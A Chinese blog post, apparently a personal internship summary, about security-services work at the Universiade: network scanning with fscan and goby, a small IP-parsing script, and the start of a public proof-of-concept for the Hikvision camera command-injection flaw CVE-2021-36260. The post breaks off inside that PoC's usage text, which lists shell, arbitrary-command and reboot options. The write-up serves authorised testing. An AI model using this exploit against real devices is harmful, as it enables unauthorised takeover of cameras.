<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-B0FHXMTYNC"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-B0FHXMTYNC');
</script>
<!-- End Google Analytics -->

  
  <title>安恒大运会安服实习总结 | Kizureina&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="实习总结没想到这么快就要结束了，虽然很有不少蛋疼的地方，但还是让人难忘的经历吧。 本来想在正赛开始时写，结果现在都要闭幕式了。事物只要有开始就会有终结，漫长的实习里，一旦比赛开始就意味着尾声接近了。所以希腊人才喜欢说最好的人生是从未出生，因为没有开始就没有结束，非生非死。非始非终，所以才叫终之空吧(不对，我在说什么)。 不爽的地方很多，但最不爽的是妹子太少，早知道去做志愿者和西南民大的妹子相亲相爱">
<meta property="og:type" content="article">
<meta property="og:title" content="安恒大运会安服实习总结">
<meta property="og:url" content="https://kizureina.github.io/2023/07/31/Record-of-Web-Sec-s-practice/index.html">
<meta property="og:site_name" content="Kizureina&#39;s Blog">
<meta property="og:description" content="实习总结没想到这么快就要结束了，虽然很有不少蛋疼的地方，但还是让人难忘的经历吧。 本来想在正赛开始时写，结果现在都要闭幕式了。事物只要有开始就会有终结，漫长的实习里，一旦比赛开始就意味着尾声接近了。所以希腊人才喜欢说最好的人生是从未出生，因为没有开始就没有结束，非生非死。非始非终，所以才叫终之空吧(不对，我在说什么)。 不爽的地方很多，但最不爽的是妹子太少，早知道去做志愿者和西南民大的妹子相亲相爱">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s1.ax1x.com/2023/08/07/pPE4Qz9.png">
<meta property="og:image" content="https://s1.ax1x.com/2023/08/07/pPEIpcj.png">
<meta property="article:published_time" content="2023-07-30T23:31:52.000Z">
<meta property="article:modified_time" content="2024-01-01T16:09:57.613Z">
<meta property="article:author" content="Kizurena">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2023/08/07/pPE4Qz9.png">
  
    <link rel="alternate" href="/atom.xml" title="Kizureina's Blog" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/banner.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>Kizureina's Blog </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
      <a class="main-nav-link" href="/links">Links</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS 订阅">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="搜索" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
      <a class="nav-dropdown-link" href="/links">Links</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS 订阅">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=/assets/avatar2.png></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">Kizureina </div>
      <div class="dot"></div>
      <div class="subtitle">I know nothing except the fact of my ignorance. </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/Kizureina" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">标签</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Advanced-Mathematics/" rel="tag">Advanced Mathematics</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Android/" rel="tag">Android</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Anime/" rel="tag">Anime</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Comic/" rel="tag">Comic</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Galgame/" rel="tag">Galgame</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/JavaScript/" rel="tag">JavaScript</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Linear-Algebraic/" rel="tag">Linear Algebraic</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Linear-Algebraic-Advanced-Mathematics/" rel="tag">Linear Algebraic Advanced Mathematics</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Linux/" rel="tag">Linux</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Machine-Learning/" rel="tag">Machine Learning</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/RCE/" rel="tag">RCE</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Reverse-shell/" rel="tag">Reverse shell</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/java/" rel="tag">java</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/web/" rel="tag">web</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E5%B5%8C%E5%85%A5%E5%BC%8F/" rel="tag">嵌入式</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E7%A1%AC%E4%BB%B6/" rel="tag">硬件</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">归档</h3>
      
      
        <a class="archive-link" href="/archives/2024/07 ">
          七月 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/06 ">
          六月 2024 
          <div class="archive-count">5 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/05 ">
          五月 2024 
          <div class="archive-count">5 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/04 ">
          四月 2024 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/03 ">
          三月 2024 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/02 ">
          二月 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/01 ">
          一月 2024 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/12 ">
          十二月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/11 ">
          十一月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/10 ">
          十月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/09 ">
          九月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/07 ">
          七月 2023 
          <div class="archive-count">5 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/06 ">
          六月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/03 ">
          三月 2023 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/02 ">
          二月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/01 ">
          一月 2023 
          <div class="archive-count">4 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/12 ">
          十二月 2022 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/11 ">
          十一月 2022 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/09 ">
          九月 2022 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/06 ">
          六月 2022 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/04 ">
          四月 2022 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/03 ">
          三月 2022 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/02 ">
          二月 2022 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2022/01 ">
          一月 2022 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2021/12 ">
          十二月 2021 
          <div class="archive-count">1 </div>
        </a>
      
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">最新文章</h3>
      <ul>
        
          <li>
            <a href="/2024/07/12/Log-of-Summer/">暑假日志</a>
          </li>
        
          <li>
            <a href="/2024/06/18/Note-of-Linear-Algebraic/">线性代数笔记</a>
          </li>
        
          <li>
            <a href="/2024/06/11/Note-of-Local-Address-Net-Security2/">内网安全攻防笔记(下)</a>
          </li>
        
          <li>
            <a href="/2024/06/10/Note-of-Local-Address-Net-Security/">内网安全攻防笔记(上)</a>
          </li>
        
          <li>
            <a href="/2024/06/08/Analysis-of-CVE-2024-4577/">古老漏洞的复活：php-cgi命令注入(CVE-2024-4577)漏洞分析</a>
          </li>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-Record-of-Web-Sec-s-practice" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        安恒大运会安服实习总结
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2023-07-30T23:31:52.000Z" itemprop="datePublished">2023-07-31</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/WebSec/">WebSec</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            3k 词 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h2 id="实习总结"><a href="#实习总结" class="headerlink" title="实习总结"></a>实习总结</h2><p>没想到这么快就要结束了，虽然很有不少蛋疼的地方，但还是让人难忘的经历吧。</p>
<p>本来想在正赛开始时写，结果现在都要闭幕式了。事物只要有开始就会有终结，漫长的实习里，一旦比赛开始就意味着尾声接近了。所以希腊人才喜欢说最好的人生是从未出生，因为没有开始就没有结束，非生非死。非始非终，所以才叫终之空吧(不对，我在说什么)。</p>
<p>不爽的地方很多，但最不爽的是妹子太少，早知道去做志愿者和西南民大的妹子相亲相爱了。除此之外，工作还算轻松，就是技术含量一般，比较无聊。</p>
<h3 id="资产收集-x2F-漏洞扫描"><a href="#资产收集-x2F-漏洞扫描" class="headerlink" title="资产收集&#x2F;漏洞扫描"></a>资产收集&#x2F;漏洞扫描</h3><p>虽然是做渗透，其实大部分工作是拿工具直接做漏洞扫描，但想想一个网段内这么多资产，这样确实是最高效的办法：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ppap.exe -hf -ping 10.txt -p 1-65535 -o result.txt</span><br></pre></td></tr></table></figure>

<p>但半天只用一行命令跑fscan然后盯着命令行的黑框等跑完，还是很无聊。</p>
<p>不过fsan实在是神器，无论找网段内的资产还是简单的漏洞测试都很不错，尤其是能把网段内大部分资产给出来实在很方便：</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pPE4Qz9"><img src="https://s1.ax1x.com/2023/08/07/pPE4Qz9.png" alt="pPE4Qz9.png"></a></p>
<p>但有些资产扫不出来，漏洞更是几乎都扫不出来。</p>
<p>在漏扫上用goby明显更好：</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pPEIpcj"><img src="https://s1.ax1x.com/2023/08/07/pPEIpcj.png" alt="pPEIpcj.png"></a></p>
<p>当然经过配置插件之类还能更好用。</p>
<p>另外因为要写资产清单的excel表，但fscan默认输出的格式与要上交的EXCEL格式不一样，一个一个复制很麻烦，而且程序员怎么能容忍一件事重复做三遍？所以动手写了个简单的脚本做文本处理：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 打开文件，读取所有行</span></span><br><span class="line">filename = <span class="built_in">input</span>(<span class="string">&quot;输入要处理的文件名：&quot;</span>)</span><br><span class="line"><span class="comment"># 打开文件，读取所有行</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    lines = f.readlines()</span><br><span class="line"></span><br><span class="line"><span class="comment"># 处理每一行数据</span></span><br><span class="line">ips = <span class="built_in">set</span>()  <span class="comment"># 使用集合保存不重复的IP地址</span></span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> lines:</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;[*]&#x27;</span> <span class="keyword">in</span> line:  <span class="comment"># 如果包含[*]，则退出程序</span></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;END&quot;</span>)</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">    ip_port, status = line.strip().split(<span class="string">&#x27; &#x27;</span>)  <span class="comment"># 按空格分割IP+端口和状态信息</span></span><br><span class="line">    ip, port = ip_port.split(<span class="string">&#x27;:&#x27;</span>)  <span class="comment"># 按冒号分割IP地址和端口号</span></span><br><span class="line">    <span class="keyword">if</span> status == <span class="string">&#x27;open&#x27;</span>:  <span class="comment"># 只处理状态为open的IP地址</span></span><br><span class="line">        ips.add(ip)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 输出结果</span></span><br><span class="line"><span class="keyword">for</span> ip <span class="keyword">in</span> ips:</span><br><span class="line">    <span class="built_in">print</span>(ip)</span><br><span class="line"><span class="comment">#E:\Anheng\双流体育中心\ppap&gt;ppap.exe -ping  -hf 10.txt -p 1-65535 -o 41to50result.txt</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h3><p>既然已经做过两遍渗透了，当然很少能扫出什么高危的洞来。所以就拿着扫到的资产手动做下渗透，挨个URL点进去看看。但响应码是200的居然意想不到的多，而且实际上是有复杂的SpringBoot集群后端，花了不少功夫才搞明白。最多的当然是海康威视的摄像头，但所有的web管理页面都有强密码。</p>
<h4 id="海康威视摄像头RCE"><a href="#海康威视摄像头RCE" class="headerlink" title="海康威视摄像头RCE"></a>海康威视摄像头RCE</h4><p>不过，最早让我注意到的是之前的漏洞清单上有海康的RCE漏洞<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_50854662/article/details/128700889">CVE-2021-36260</a>，这个洞非常惊人。原理很复杂，但实际利用和复现却相当简单，而且如果能利用成功，就能拿到服务器最高权限。我用网上搜到的POC测了下，POC如下，很简单的python代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Exploit Title: Hikvision Web Server Build 210702 - Command Injection</span></span><br><span class="line"><span class="comment"># Exploit Author: bashis</span></span><br><span class="line"><span class="comment"># Vendor Homepage: https://www.hikvision.com/</span></span><br><span class="line"><span class="comment"># Version: 1.0</span></span><br><span class="line"><span class="comment"># CVE: CVE-2021-36260</span></span><br><span class="line"><span class="comment"># Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># All credit to Watchful_IP</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">Note:</span></span><br><span class="line"><span class="string">1)  This code will _not_ verify if remote is Hikvision device or not.</span></span><br><span class="line"><span class="string">2)  Most of my interest in this code has been concentrated on how to</span></span><br><span class="line"><span class="string">    reliably detect vulnerable and/or exploitable devices.</span></span><br><span class="line"><span class="string">    Some devices are easy to detect, verify and exploit the vulnerability,</span></span><br><span class="line"><span class="string">    other devices may be vulnerable but not so easy to verify and exploit.</span></span><br><span class="line"><span class="string">    I think the combined verification code should have very high accuracy.</span></span><br><span class="line"><span class="string">3)  &#x27;safe check&#x27; (--check) will try write and read for verification</span></span><br><span class="line"><span class="string">    &#x27;unsafe check&#x27; (--reboot) will try reboot the device for verification</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[Examples]</span></span><br><span class="line"><span class="string">Safe vulnerability/verify check:</span></span><br><span class="line"><span class="string">    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Safe and unsafe vulnerability/verify check:</span></span><br><span class="line"><span class="string">(will only use &#x27;unsafe check&#x27; if not verified with &#x27;safe check&#x27;)</span></span><br><span class="line"><span class="string">    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Unsafe vulnerability/verify check:</span></span><br><span class="line"><span class="string">    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Launch and connect to SSH shell:</span></span><br><span class="line"><span class="string">    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Execute command:</span></span><br><span class="line"><span class="string">    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd &quot;ls -l&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Execute blind command:</span></span><br><span class="line"><span class="string">    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind &quot;reboot&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">$./CVE-2021-36260.py -h</span></span><br><span class="line"><span class="string">[*] Hikvision CVE-2021-36260</span></span><br><span class="line"><span class="string">[*] PoC by bashis &lt;mcw noemail eu&gt; (2021)</span></span><br><span class="line"><span class="string">usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]</span></span><br><span class="line"><span class="string">                         [--reboot] [--shell] [--cmd CMD]</span></span><br><span class="line"><span class="string">                         [--cmd_blind CMD_BLIND] [--noverify]</span></span><br><span class="line"><span class="string">                         [--proto &#123;http,https&#125;]</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">optional arguments:</span></span><br><span class="line"><span class="string">  -h, --help            show this help message and exit</span></span><br><span class="line"><span class="string">  --rhost RHOST         Remote Target Address (IP/FQDN)</span></span><br><span class="line"><span class="string">  --rport RPORT         Remote Target Port</span></span><br><span class="line"><span class="string">  --check               Check if vulnerable</span></span><br><span class="line"><span class="string">  --reboot              Reboot if vulnerable</span></span><br><span class="line"><span class="string">  --shell               Launch SSH shell</span></span><br><span class="line"><span class="string">  --cmd CMD             execute cmd (i.e: &quot;ls -l&quot;)</span></span><br><span class="line"><span class="string">  --cmd_blind 